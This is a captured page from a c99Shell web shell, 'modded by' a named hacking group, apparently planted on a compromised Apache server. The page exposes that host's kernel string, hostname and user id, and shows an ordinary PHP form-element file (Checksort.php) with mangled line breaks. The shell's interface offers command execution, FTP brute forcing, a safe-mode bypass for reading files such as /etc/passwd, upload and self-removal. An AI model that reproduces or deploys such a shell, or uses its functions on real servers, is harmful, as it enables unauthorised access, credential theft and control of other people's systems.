!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/reportEregis111/PFBC/Element/   drwxr-xr-x
Free 50.96 GB of 127.8 GB (39.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Checksort.php (2.16 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
namespace PFBCElement
;

class 
Checksort extends Sort {
    protected 
$_attributes = array("type" => "checkbox");
    protected 
$inline;

    public function 
render() { 
        if(isset(
$this->_attributes["value"])) {
            if(!
is_array($this->_attributes["value"]))
                
$this->_attributes["value"] = array($this->_attributes["value"]);
        }
        else
            
$this->_attributes["value"] = array();

        if(
substr($this->_attributes["name"], -2) != "[]")
            
$this->_attributes["name"] .= "[]";

        
$labelClass $this->_attributes["type"];
        if(!empty(
$this->inline))
            
$labelClass .= " inline";
        
        
$count 0;
        
$existing "";

        foreach(
$this->options as $value => $text) {
            
$value $this->getOptionValue($value);
            if(!empty(
$this->inline) && $count 0)
                echo 
' ';
            echo 
'<label class="'$labelClass'"><input id="'$this->_attributes["id"], '-'$count'"'$this->getAttributes(array("id""value""checked""name""onclick""required")), ' value="'$this->filter($value), '"';
            if(
in_array($value$this->_attributes["value"]))
                echo 
' checked="checked"';
            echo 
' onclick="updateChecksort(this, \''str_replace(array('"'"'"), array('&quot;'"\'"), $text), '\');"/>'$text'</label>';

            if(
in_array($value$this->_attributes["value"]))
                
$existing .= '<li id="' $this->_attributes["id"] . "-sort-" $count '" class="ui-state-default"><input type="hidden" name="' $this->_attributes["name"] . '" value="' $value '"/>' $text '</li>';

            ++
$count;
        }

        echo 
'<ul id="'$this->_attributes["id"], '">'$existing'</ul>';
    }

    function 
renderJS() {
        echo <<<JS
if(typeof updateChecksort != "function") {        
    function updateChecksort(element, text) 
{
        var position = element.id.lastIndexOf("-");
        var id = element.id.substr(0, position);
        var index = element.id.substr(position + 1);
        if(element.checked) 
{
            jQuery("#" + id).append('<li id="' + id + '-sort-' + index + '" class="ui-state-default"><input type="hidden" name="
{$this->_attributes["name"]}" value="' + element.value + '"/>' + text + '</li>');
        
}    
        else
            jQuery("#" + id + "-sort-" + index).remove();
    
}
}
JS;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0159 ]--